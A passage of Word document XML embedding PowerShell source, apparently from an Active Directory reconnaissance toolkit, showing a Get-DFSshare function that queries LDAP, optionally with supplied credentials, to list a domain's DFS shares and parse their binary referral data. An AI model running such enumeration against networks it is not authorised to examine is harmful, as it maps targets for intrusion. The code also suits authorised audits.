    <w:p w14:paraId="458834FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15655C13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($_.scriptpath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8A050A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                SplitPath($_.scriptpath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F03D0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6315A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($_.profilepath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041AFA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                SplitPath($_.profilepath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FBB44A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D405DF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59609EF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        } | Where-Object {$_} | Sort-Object -Unique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF87C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C7D406" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D1DCD03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B4EB5F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-DFSshare {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A7C8AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CA9009" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76044E0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1E337669" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns a list of all fault-tolerant distributed file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37525ACF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        systems for a given domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7287AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DCBAE78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F11B77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61B79752" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The version of DFS to query for servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B34FEA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        1/v1, 2/v2, or all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B19382A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="318C5649" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD6FCBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25AAF724" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for user DFS shares, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD7EC22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="388A95D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A32981" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="097C0FE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777A18A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2210D0C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2643EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2908A893" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C37E259" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F34D19" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0EE1669E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A6727" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0DC4465F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC6016" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="648F00F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D24B675" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64787F38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB56394" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA159C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27DBCA6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F19FC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="118A4EA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-DFSshare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F86EEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32C46984" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all distributed file system shares for the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410CA9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0339DBD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB311FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39C5AC58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        PS C:\&gt; Get-DFSshare -Domain test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F71747F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E8F25BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all distributed file system shares for the 'test' domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A7E2BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B211C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="455FC938" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B7345A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D600D5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED196D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateSet("All","V1","1","V2","2")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF53B5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Version = "All",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF37E03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4435EC0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD2940" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0514727E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C78F102" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C2E47E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC49EE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B10B153" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6F99D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D9B07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65E15826" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FF8658" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D19DF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A59E7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7DBDFD1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA474AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D6977" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F63D8DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54837FEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    function Parse-Pkt {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CFD202" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B87CED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9D8702" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [byte[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C513BAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Pkt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236B67E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7D5BF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="663DC6CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $bin = $Pkt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B00AFE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $blob_version = [bitconverter]::ToUInt32($bin[0..3],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14689C9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4D0456" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $offset = 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AC0DCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #https://msdn.microsoft.com/en-us/library/cc227147.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4099E137" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $object_list = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A61C4DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for($i=1; $i -le $blob_element_count; $i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CA2083" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               $blob_name_size_start = $offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E0D58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               $blob_name_size_end = $offset + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1962B4F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               $blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC488CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60C0CEA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               $blob_name_start = $blob_name_size_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC3CC21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               $blob_name_end = $blob_name_start + $blob_name_size - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757AFF6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               $blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5F8F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C4C61F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               $blob_data_size_start = $blob_name_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3956F27C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               $blob_data_size_end = $blob_data_size_start + 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A149E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               $blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619CE800" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B7D33F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               $blob_data_start = $blob_data_size_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3FA77A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               $blob_data_end = $blob_data_start + $blob_data_size - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E08F339" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">               $blob_data = $bin[$blob_data_start..$blob_data_end]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7867ADF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">               switch -wildcard ($blob_name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C88E765" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                "\siteroot" {  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B21D672" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                "\domainroot*" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2CBB91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B246FBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # DFSRootOrLinkIDBlob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF52C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $root_or_link_guid_start = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25771062" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $root_or_link_guid_end = 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC37A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AFB00C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D01A6E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $prefix_size_start = $root_or_link_guid_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236CF75D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $prefix_size_end = $prefix_size_start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265A5F89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740FDFCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $prefix_start = $prefix_size_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200A0E9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $prefix_end = $prefix_start + $prefix_size - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDFBE82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9C4569" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C1FB238" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $short_prefix_size_start = $prefix_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67050FE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $short_prefix_size_end = $short_prefix_size_start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483FA047" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4A6B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $short_prefix_start = $short_prefix_size_end + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ABF1E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $short_prefix_end = $short_prefix_start + $short_prefix_size - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766AF7D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
